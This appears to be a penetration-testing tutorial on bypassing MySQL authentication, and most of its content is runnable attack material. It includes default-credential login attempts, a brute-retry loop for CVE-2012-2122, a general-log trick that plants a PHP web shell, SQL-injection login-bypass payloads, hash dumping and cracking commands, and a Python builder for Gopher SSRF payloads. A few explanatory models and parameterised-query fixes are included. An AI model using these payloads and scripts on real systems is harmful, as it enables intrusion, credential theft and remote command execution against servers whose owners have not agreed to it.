MySQL Security

MySQL Authentication Bypass

Youssef
17 May 2026

Default & Empty Credentials

The most common MySQL authentication issue is simply missing or default credentials: a root account with no password, a vendor default, or an anonymous account left behind by a pre-5.7 install. Always test these before attempting complex exploits.

# Try connecting with no password. --password= passes an explicit empty
# password; a bare -p (or -p'', which the shell reduces to -p) prompts instead.
mysql -u root -h target.com
mysql -u root -h target.com --password=

# Try common credentials (no space between -p and the password)
mysql -u root -h target.com -proot
mysql -u root -h target.com -pmysql
mysql -u root -h target.com -ptoor
mysql -u admin -h target.com -padmin
mysql -u root -h target.com -p123456

# Check for anonymous users. An ''@'%' or ''@'localhost' account matches any
# username that has no account of its own, with no password.
mysql -h target.com
mysql -u '' -h target.com

# Scan with nmap (mysql-info also reports the server version and auth plugin)
nmap -p 3306 --script mysql-empty-password target.com
nmap -p 3306 --script mysql-info,mysql-empty-password target.com

CVE-2012-2122 — Authentication Bypass via memcmp()

In MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 (and the matching MariaDB releases), check_scramble() returned the result of memcmp() through a my_bool, which is a C char. On builds whose memcmp() can return values outside -128..127 (for example glibc's SSE-optimised memcmp on some 64-bit Linux distributions), the return value is truncated, and roughly 1 in 256 wrong passwords truncates to 0 and is accepted as correct. Builds linked against a memcmp() that only returns -1/0/1 are not affected, so the same version string can be vulnerable on one distribution and safe on another. This is not a timing attack, just a probabilistic one: keep retrying with any wrong password. Metasploit's auxiliary/scanner/mysql/mysql_authbypass_hashdump automates the loop and dumps mysql.user on success.

# Retry until the ~1/256 truncation lands (1000 attempts ≈ 98% success
# against a vulnerable build)
for i in $(seq 1 1000); do
    mysql -u root -pwrong -h target.com -e "SELECT 1" 2>/dev/null && echo "BYPASS at attempt $i" && break
done

# Python version
import subprocess

for i in range(1, 1001):
    result = subprocess.run(
        ['mysql', '-u', 'root', '-pwrong', '-h', 'target.com', '-e', 'SELECT 1'],
        capture_output=True)
    if result.returncode == 0:   # the client exits 0 only once the server accepted the login
        print(f"Bypassed at attempt {i}")
        break

-- Check vulnerable version (from any session you already have, or nmap mysql-info)
SELECT version();   -- 5.1.x < 5.1.63 or 5.5.x < 5.5.24
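To see why blind retries work, here is an added model of the bug (example code written for this page, not MySQL's source). `wide_memcmp` stands in for an optimised memcmp() that returns a raw difference instead of -1/0/1, `to_my_bool` applies the char truncation that the vulnerable check_scramble() performed, and the two check functions contrast the vulnerable and fixed comparisons. The 4-byte-word comparison, the random inputs and the 20-byte "hashes" are constructed for illustration; real libc implementations differ in exactly how they produce out-of-range values.

```python
import math
import random

SHA1_HASH_SIZE = 20


def wide_memcmp(a: bytes, b: bytes) -> int:
    """Model of an optimised memcmp(): signed difference of the first differing
    4-byte word instead of a normalised -1/0/1 (constructed for illustration)."""
    assert len(a) == len(b) == SHA1_HASH_SIZE
    for i in range(0, SHA1_HASH_SIZE, 4):
        wa = int.from_bytes(a[i:i + 4], "big")
        wb = int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            return wa - wb
    return 0


def to_my_bool(value: int) -> int:
    """Narrow a C int to a C char, as returning memcmp()'s result through
    my_bool (a char) did in the vulnerable check_scramble()."""
    return ((value + 128) % 256) - 128


def check_scramble_vulnerable(stored_stage2: bytes, reassured_stage2: bytes) -> bool:
    """Vulnerable: any memcmp() result whose low byte is zero reads as 'match'."""
    return to_my_bool(wide_memcmp(stored_stage2, reassured_stage2)) == 0


def check_scramble_fixed(stored_stage2: bytes, reassured_stage2: bytes) -> bool:
    """Fixed: the result is normalised to 0/1 before it is narrowed."""
    mismatch = 1 if wide_memcmp(stored_stage2, reassured_stage2) != 0 else 0
    return mismatch == 0


def deterministic_bypass() -> tuple:
    """Two different hashes whose first words differ by exactly 256: the
    truncated result is 0, so the vulnerable check accepts them."""
    stored = bytes(SHA1_HASH_SIZE)
    wrong = b"\x00\x00\x01\x00" + bytes(SHA1_HASH_SIZE - 4)
    return check_scramble_vulnerable(stored, wrong), check_scramble_fixed(stored, wrong)


def estimate_bypass_rate(trials: int = 20000, seed: int = 1) -> float:
    """Fraction of random wrong-password comparisons the vulnerable check accepts
    (expected ~1/256: the low byte of the difference is uniform over 0..255)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        stored = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        wrong = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        if check_scramble_vulnerable(stored, wrong):
            hits += 1
    return hits / trials


def attempts_for_confidence(confidence: float = 0.99, p: float = 1 / 256) -> int:
    """Retries needed so that P(at least one bypass) >= confidence."""
    return math.ceil(math.log(1 - confidence) / math.log(1 - p))


if __name__ == "__main__":
    print("deterministic (vulnerable, fixed):", deterministic_bypass())
    print("simulated bypass rate:", estimate_bypass_rate())
    print("attempts for 99% confidence:", attempts_for_confidence())
```

`attempts_for_confidence()` is the number to put in the retry loop: about 1,180 attempts for 99% confidence, so the 1000 used above is a reasonable default and a clean run of several thousand attempts is good evidence the build is not affected.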

CVE-2016-6662 — my.cnf Injection

CVE-2016-6662 (MySQL up to 5.5.51 / 5.6.32 / 5.7.14, plus the MariaDB and Percona builds of the time) is a post-authentication privilege escalation to root, not an authentication bypass. An account with the FILE privilege, or an SQL injection that reaches one, writes a configuration file that mysqld_safe reads on the next service restart. Because mysqld_safe runs as root and honours malloc_lib= from its [mysqld_safe]/[mysqld] option groups, pointing that option at an attacker-controlled shared object loads the library with root privileges. The constraints are: FILE privilege, secure_file_priv not blocking the target directory, write access for the mysql user to a location the startup script consults (typically the datadir, since /etc/mysql/conf.d/ is root-owned and not writable by mysqld), and a restart of the service. The exact file layout and the restart trigger are in Dawid Golunski's original advisory.

The general-log trick below is a separate, older technique that is often confused with it: with SUPER (SYSTEM_VARIABLES_ADMIN on 8.0) you can redirect the general query log into the web root and then issue a query whose text is PHP, because the log records the full query text. No config file and no restart are needed, but the web root must be writable by the mysql user.

-- Needs SUPER; secure_file_priv does not apply to the general log
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SET GLOBAL general_log = 'ON';

-- The query text itself lands in the log file
SELECT '<?php system($_GET["cmd"]); ?>';

-- Then request /shell.php?cmd=id and turn the log off again
SET GLOBAL general_log = 'OFF';

Authentication Bypass via SQL Injection in Login Forms

-- Classic bypass payloads for MySQL. The trailing "-- -" (MySQL requires
-- whitespace after the double dash) or "#" comments out the password check.
username: admin'-- -
username: admin'#
username: ' OR 1=1-- -
username: ' OR '1'='1'-- -
username: admin') OR ('1'='1'-- -      -- when the username sits inside parentheses
username: ') OR 1=1-- -

-- Password field injection (only works if the app compares the password in SQL)
password: ' OR '1'='1
password: anything' OR 'x'='x

-- With UNION to bypass an application-side hash comparison
username: ' UNION SELECT 1,'hash_you_know',3-- -
-- The column count must match the original SELECT; the app then compares the
-- submitted password against the hash you supplied, not the real one

-- Bypassing prepared statements with a second-order injection
-- 1. Register: username = admin'-- -
-- 2. Stored safely via a parameterised INSERT
-- 3. Later read back and concatenated into, e.g., a password-change UPDATE,
--    whose WHERE clause collapses to username = 'admin' → auth bypass
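The UNION and second-order cases above are the two that defeat an application-side hash check, so here is an added runnable demonstration of both (example code written for this page, not from any real application). sqlite3 stands in for MySQL so it runs offline; the users table, the admin password and the attacker's password are constructed, and the `-- -` payload works because both dialects treat `-- ` as a line comment.

```python
import hashlib
import sqlite3
from typing import Optional

# sqlite3 stands in for MySQL here so the demo runs offline (constructed database).


def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)")
    # Constructed admin row; the attacker does not know this password.
    db.execute("INSERT INTO users VALUES (1, 'admin', ?, 'admin')", (sha1_hex("correct horse battery"),))
    db.commit()
    return db


def login_vulnerable(db, username: str, password: str) -> Optional[dict]:
    """Username concatenated into the query; the hash check happens in app code."""
    query = "SELECT id, password_hash, role FROM users WHERE username = '%s'" % username
    row = db.execute(query).fetchone()
    if row is None:
        return None
    user_id, stored_hash, role = row
    # Whoever controls the returned row also controls the hash being compared.
    return {"id": user_id, "role": role} if stored_hash == sha1_hex(password) else None


def login_fixed(db, username: str, password: str) -> Optional[dict]:
    """Parameterised lookup: the payload is just a username that matches nothing."""
    row = db.execute("SELECT id, password_hash, role FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    user_id, stored_hash, role = row
    return {"id": user_id, "role": role} if stored_hash == sha1_hex(password) else None


def union_payload(attacker_password: str) -> str:
    """The UNION trick: supply a row whose hash you know; the column count must match."""
    return "' UNION SELECT 1,'%s','admin'-- -" % sha1_hex(attacker_password)


def register(db, username: str, password: str) -> None:
    """Registration uses parameters, so the hostile username is stored verbatim, safely."""
    db.execute("INSERT INTO users (username, password_hash, role) VALUES (?, ?, 'user')",
               (username, sha1_hex(password)))
    db.commit()


def change_password_vulnerable(db, stored_username: str, new_password: str) -> int:
    """Second-order sink: the stored username is trusted and concatenated into an UPDATE.
    With stored_username = "admin'-- -" the WHERE clause collapses to username = 'admin'.
    Returns the number of rows changed."""
    query = "UPDATE users SET password_hash = '%s' WHERE username = '%s'" % (
        sha1_hex(new_password), stored_username)
    cursor = db.execute(query)
    db.commit()
    return cursor.rowcount


if __name__ == "__main__":
    db = build_db()
    print("UNION bypass:", login_vulnerable(db, union_payload("attacker"), "attacker"))
    print("same payload, parameterised:", login_fixed(db, union_payload("attacker"), "attacker"))
    register(db, "admin'-- -", "irrelevant")
    print("rows changed by second-order UPDATE:", change_password_vulnerable(db, "admin'-- -", "pwned"))
    print("admin login with attacker's password:", login_fixed(db, "admin", "pwned"))
```

The fix for both sinks is the same: every query that takes the username, including the ones that read it back from the database, must be parameterised; escaping only at the input boundary is what makes the second-order case possible.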

Hash Cracking

-- Dump hashes (needs SELECT on mysql.user, e.g. after a root or anonymous login)
SELECT user, host, plugin, authentication_string FROM mysql.user;   -- 5.7+ / 8.0
SELECT user, host, password FROM mysql.user;                        -- 5.6 and older

-- Hash formats
-- MySQL 4.0 ("old" pre-4.1 hash): 16 hex chars  e.g. 6f8c114b58f2ce9e
-- mysql_native_password (4.1+): *SHA1(SHA1(pass)) e.g. *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (unsalted)
-- caching_sha2_password (8.0 default): $A$005$<salt><hash>, salted and far slower to crack

-- Crack with hashcat (strip the leading * for -m 300)
hashcat -m 200 hashes.txt /usr/share/wordlists/rockyou.txt    # MySQL323 (16 hex chars)
hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt    # MySQL4.1/5+
hashcat -m 7401 hashes.txt /usr/share/wordlists/rockyou.txt   # MySQL $A$ (caching_sha2_password)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt   # bcrypt: application user tables, not mysql.user

-- Crack with john (the mysql-sha1 format accepts the * prefix)
john --format=mysql-sha1 hashes.txt --wordlist=rockyou.txt
john --format=mysql hashes.txt --wordlist=rockyou.txt         # old 16-hex format

-- Online lookup
-- https://crackstation.net
-- https://hashes.com
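The mysql_native_password hash is unsalted and cheap, which is why dictionary attacks on it are fast. The added example below (written for this page, not MySQL's code) computes the stored hash, runs a toy dictionary attack against the hash quoted above, and implements both sides of the challenge-response so you can see what the server actually needs: it recovers SHA1(password) from the client's scramble and hashes it once more. The wordlist and the salt are constructed; `to_hashcat_300` is a helper name chosen here.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_native_hash(password: str) -> str:
    """What PASSWORD() stored for mysql_native_password: '*' + hex(SHA1(SHA1(pw)))."""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def client_scramble(password: str, salt: bytes) -> bytes:
    """Client side of mysql_native_password: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))).
    salt is the 20-byte challenge from the server greeting."""
    stage1 = sha1(password.encode())
    mask = sha1(salt + sha1(stage1))
    return bytes(x ^ y for x, y in zip(stage1, mask))


def server_verify(stored_hash: str, salt: bytes, scramble: bytes) -> bool:
    """Server side: unmask the scramble to recover SHA1(pw), hash it once more and
    compare with the stored SHA1(SHA1(pw)). Note that SHA1(pw) on its own would be
    enough to build a valid scramble; the stored double hash is not."""
    if not stored_hash.startswith("*") or len(scramble) != 20:
        return False
    stage2 = bytes.fromhex(stored_hash[1:])
    mask = sha1(salt + stage2)
    stage1 = bytes(x ^ y for x, y in zip(scramble, mask))
    return hmac.compare_digest(sha1(stage1), stage2)


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: two SHA1s per candidate and no salt, so every
    candidate tests against every account in the dump at once."""
    target = stored_hash.upper()
    for candidate in wordlist:
        if mysql_native_hash(candidate) == target:
            return candidate
    return None


def to_hashcat_300(stored_hash: str) -> str:
    """hashcat -m 300 expects the 40 hex characters without the leading '*'."""
    return stored_hash.lstrip("*").lower()


if __name__ == "__main__":
    # Constructed wordlist; the hash is the one quoted above for 'password'.
    h = "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"
    print("cracked:", crack(h, ["123456", "toor", "password", "mysql"]))
    salt = os.urandom(20)
    print("login with right password:", server_verify(h, salt, client_scramble("password", salt)))
    print("login with wrong password:", server_verify(h, salt, client_scramble("passw0rd", salt)))
```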

MySQL over SSRF / Gopher

-- If SSRF is available, attack MySQL via the Gopher protocol
-- Gopher sends the raw bytes after the type character straight down the TCP
-- connection, so one URL can carry a complete MySQL login packet plus a query

-- Generate the payload with Gopherus
python3 gopherus.py --exploit mysql
# Input: root (username), no password, the SQL to run

-- Payload looks like:
gopher://127.0.0.1:3306/_%A3%00%00%01%85%A6%FF%01...

-- Works when:
-- MySQL is reachable from the SSRF host (usually 127.0.0.1:3306)
-- The account has no password: the login packet is sent blind, without reading
--   the server greeting, so the 20-byte salt needed to scramble a real password
--   is never available. mysql_native_password accounts are the reliable case;
--   if the server answers with an auth-switch request for another plugin, a
--   one-shot stream cannot reply to it
-- The SSRF client supports gopher:// (curl/libcurl, PHP file_get_contents where
--   the gopher wrapper is available)
-- You never see the response, so use queries with side effects you can
--   observe elsewhere (INTO OUTFILE, inserts into a table the app reads)
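What Gopherus is encoding, as an added example (written for this page, not Gopherus' code): the HandshakeResponse41 login packet for a passwordless mysql_native_password account, followed by a COM_QUERY, percent-encoded into a gopher:// URL. The capability flags are a minimal set chosen here, so the bytes differ from the Gopherus sample above; the host, port and query are constructed inputs.

```python
import struct

CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
COM_QUERY = 0x03
UTF8_GENERAL_CI = 0x21


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """MySQL wire framing: 3-byte little-endian payload length + 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def handshake_response(username: str, auth_response: bytes = b"") -> bytes:
    """HandshakeResponse41 for a mysql_native_password account. For a real password
    auth_response would be SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))) and needs the
    server's 20-byte salt; with an empty password it is simply empty, which is why
    the blind Gopher attack only works against passwordless accounts."""
    caps = CLIENT_LONG_PASSWORD | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    payload = struct.pack("<II", caps, 0x01000000)      # capability flags, max packet size
    payload += bytes([UTF8_GENERAL_CI]) + bytes(23)     # charset + reserved filler
    payload += username.encode() + b"\x00"
    payload += bytes([len(auth_response)]) + auth_response
    payload += b"mysql_native_password\x00"
    return mysql_packet(payload, seq=1)  # the server greeting we never read was sequence 0


def com_query(sql: str) -> bytes:
    """A COM_QUERY command; every command starts a new sequence at 0."""
    return mysql_packet(bytes([COM_QUERY]) + sql.encode(), seq=0)


def gopher_url(host: str, port: int, raw: bytes) -> str:
    """Gopher URL: '/' + one type character (the '_' is discarded by the client)
    followed by the stream, percent-encoded byte by byte."""
    return "gopher://%s:%d/_%s" % (host, port, "".join("%%%02X" % b for b in raw))


def build_gopher_payload(host: str, port: int, username: str, sql: str) -> str:
    """Log in as a passwordless account and run one query. The server's replies
    are never read, so sql should have a side effect observable elsewhere."""
    stream = handshake_response(username) + com_query(sql)
    return gopher_url(host, port, stream)


if __name__ == "__main__":
    print(build_gopher_payload("127.0.0.1", 3306, "root", "SELECT 1"))
```

Feeding the URL to `curl` against a local MySQL with a passwordless root is a quick way to confirm the framing; the general log on the server will show the query arriving even though curl prints nothing useful.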

Pentest Priority: Always start with empty passwords, anonymous accounts and default creds. Then scan with nmap --script 'mysql-*' (quote the glob so the shell does not expand it). Only move to CVE exploitation if the basics fail. CVE-2012-2122 is still found on old embedded systems and IoT devices running unpatched MySQL, but remember it only bites on builds whose memcmp() returns out-of-range values, so a few thousand clean attempts are needed before ruling it out.